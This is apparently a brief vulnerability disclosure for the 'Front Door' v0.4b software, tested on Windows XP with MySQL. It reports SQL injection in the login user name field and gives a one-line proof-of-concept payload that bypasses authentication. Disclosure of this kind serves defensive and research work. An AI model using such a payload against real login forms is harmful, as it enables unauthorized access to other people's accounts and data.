8 lines
No EOL
307 B
Text
8 lines
No EOL
307 B
Text
# Software Link: http://sourceforge.net/projects/frontdoor/files/Front%20Door%20-%20BETA/Front%20Door%20-%20v0.4b/frontdoor-v0.4b.rar/download
|
|
# Version: 0.4b
|
|
# Tested on: Windows XP SP3 with MySQL
|
|
|
|
|
|
Login user name field is vulnerable to sql injection.
|
|
POC:
|
|
' OR username IS NOT NULL OR username = ' |